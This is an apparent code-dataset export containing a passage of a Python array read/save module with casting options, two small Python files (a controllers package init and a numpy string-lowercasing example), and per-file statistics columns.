casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe', 'rescale'}, default='unsafe'
Controls what kind of data casting may occur:
* 'no': the data types should not be cast at all.
* 'equiv': only byte-order changes are allowed.
* 'safe': only casts which can preserve values are allowed.
* 'same_kind': only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe': any data conversions may be done.
* 'rescale': the input data is rescaled to match the dynamic
range of the output type. The minimum value in the data
is mapped to the minimum value of the data type and the
maximum value in the data is mapped to the maximum value
of the data type.
* 'rescale_zero': the input data is rescaled to match the
dynamic range of the output type, but ensuring that
zero maps to zero.
> If the data is signed and cast to a signed datatype,
zero maps to zero, and the scaling is chosen so that
both the maximum and minimum value in the data fit
in the output dynamic range.
> If the data is signed and cast to an unsigned datatype,
negative values "wrap around" (as with an unsafe cast).
> If the data is unsigned and cast to a signed datatype,
values are kept positive (the negative range is unused).
numpy : bool, default=False
Return a numpy array rather than a torch tensor.
attributes : list[str]
List of attributes to return as well.
See `MappedArray` for the possible attributes.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
file = map(file_like, permission='r', keep_open=False)
dat = file.data(*args, **kwargs)
if attributes:
attributes = {getattr(file, key) for key in attributes}
return dat, attributes
else:
return dat
def loadf(file_like, *args, attributes=None, **kwargs):
"""Read a data file and load it -- scaled -- in memory.
This function differs from `read` in several ways:
* The output data type should be a floating point type.
* If an affine scaling (slope, intercept) is defined in the
file, it is applied to the data.
* the default output data type is `torch.get_default_dtype()`.
Parameters
----------
file_like : str or file object
Path to file or file object (with methods `seek`, `read`)
dtype : dtype_like, optional
Output data type. By default, use `torch.get_default_dtype()`.
Should be a floating point type.
device : torch.device, default='cpu'
Output device.
rand : bool, default=False
If the on-disk dtype is not floating point, sample noise
in the uncertainty interval.
cutoff : float or (float, float), default=(0, 1)
Percentile cutoff. If only one value is provided, it is
assumed to relate to the upper percentile.
dim : int or list[int], optional
Dimensions along which to compute percentiles.
By default, they are computed on the flattened array.
numpy : bool, default=False
Return a numpy array rather than a torch tensor.
attributes : list[str]
List of attributes to return as well.
See `MappedArray` for the possible attributes.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
file = map(file_like, permission='r', keep_open=False)
dat = file.fdata(*args, **kwargs)
if attributes:
attributes = {getattr(file, key) for key in attributes}
return dat, attributes
else:
return dat
def save(dat, file_like, like=None, casting='unsafe', **metadata):
"""Write an array to disk.
This function makes educated choices for the file format and
its metadata based on the file extension, the data type and the
other options provided.
Parameters
----------
dat : tensor or array or MappedArray
Data to write
file_like : str or file object
Path to file or file object (with methods `seek`, `read`).
If the extension is known, it gets priority over `like` when
choosing the output format.
like : file or MappedArray
An array on-disk that should be used as a template for the new
file. Its metadata/layout/etc will be mimicked as much as possible.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe', 'rescale'}, default='unsafe'
Controls what kind of data casting may occur.
See `MappedArray.set_data`
metadata : dict
Metadata to store on disk. Values provided there will have
priority over `like`.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
if like is not None and not isinstance(like, MappedArray):
like = map(like)
remaining_classes = []
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in writer_classes:
if ext.lower() in klass.possible_extensions():
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
pass
else:
remaining_classes.append(klass)
# second guess based on `like` object
if like is not None and type(like) in remaining_classes:
klass = type(like)
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
remaining_classes = [k for k in remaining_classes
if k is not klass]
# third guess: try everything that's left
for klass in remaining_classes:
try:
return klass.save_new(dat, file_like, like, casting, **metadata)
except klass.FailedWriteError:
pass
# failed
raise ValueError('Could not write {}'.format(file_like))
def savef(dat, file_like, like=None, **metadata):
"""Write a scaled array to disk.
This function makes educated choices for the file format and
its metadata based on the file extension, the data type and the
other options provided.
The input data type must be a floating point type.
Parameters
----------
dat : tensor or array or MappedArray
Data to write
file_like : str or file object
Path to file or file object (with methods `seek`, `read`).
If the extension is known, it gets priority over `like` when
choosing the output format.
like : file or MappedArray
An array on-disk that should be used as a template for the new
file. Its metadata/layout/etc will be mimicked as much as possible.
metadata : dict
Metadata to store on disk. Values provided there will have
priority over `like`.
Returns
-------
dat : array or tensor
The array loaded in memory
attributes : dict, if attributes is not None
Dictionary of attributes loaded as well
"""
if like is not None and not isinstance(like, MappedArray):
like = map(like)
remaining_classes = []
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in writer_classes:
if ext.lower() in klass.possible_extensions():
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
pass
else:
remaining_classes.append(klass)
# second guess based on `like` object
if like is not None and type(like) in remaining_classes:
klass = type(like)
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
remaining_classes = [k for k in remaining_classes
if k is not klass]
# third guess: try everything that's left
for klass in remaining_classes:
try:
return klass.savef_new(dat, file_like, like, **metadata)
except klass.FailedWriteError:
pass
# failed
raise ValueError('Could not write {}'.format(file_like))
| 36.137725 | 89 | 0.612428 | 1,565 | 12,070 | 4.663898 | 0.173163 | 0.033977 | 0.014797 | 0.016441 | 0.799151 | 0.781614 | 0.752706 | 0.744075 | 0.723798 | 0.718044 | 0 | 0.000958 | 0.307871 | 12,070 | 333 | 90 | 36.246246 | 0.872756 | 0.562469 | 0 | 0.830357 | 0 | 0 | 0.025619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053571 | false | 0.053571 | 0.035714 | 0 | 0.205357 | 0.008929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
d4221e7b2849acba97c903c964834f1303609462 | 152 | py | Python | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null | src/Python.MicroWebSrv/Python.MicroWebSrv.Vue.Vuetify1/ServerApp/Controllers/__init__.py | grbd/GBD.NetCore.WebTemplates | 19dee03ecc98279c10999fe6c32c61e17357d4c9 | [
"MIT"
] | null | null | null |
import ServerApp.Controllers.HomeController
#import ServerApp.Controllers.SampleDataController
# TODO
#import ServerApp.Controllers.WeatherController
| 21.714286 | 50 | 0.875 | 13 | 152 | 10.230769 | 0.538462 | 0.338346 | 0.586466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065789 | 152 | 6 | 51 | 25.333333 | 0.93662 | 0.657895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
d43d8cd9f8be36f8a975b030b0514c3425cbc66b | 169 | py | Python | numpy/stringOperations/numpyFunctionLower.py | slowy07/pythonApps | 22f9766291dbccd8185035745950c5ee4ebd6a3e | [
"MIT"
] | 10 | 2020-10-09T11:05:18.000Z | 2022-02-13T03:22:10.000Z | numpy/stringOperations/numpyFunctionLower.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
] | null | null | null | numpy/stringOperations/numpyFunctionLower.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
] | 6 | 2020-11-26T12:49:43.000Z | 2022-03-06T06:46:43.000Z | # numpy.lower() function
import numpy as np
# converting to lowercase
print(np.char.lower(['ARFY', 'JOLE']))
# converting to lowercase
print(np.char.lower('JOLE')) | 18.777778 | 38 | 0.704142 | 24 | 169 | 4.958333 | 0.541667 | 0.201681 | 0.352941 | 0.436975 | 0.621849 | 0.621849 | 0.621849 | 0 | 0 | 0 | 0 | 0 | 0.136095 | 169 | 9 | 39 | 18.777778 | 0.815068 | 0.414201 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.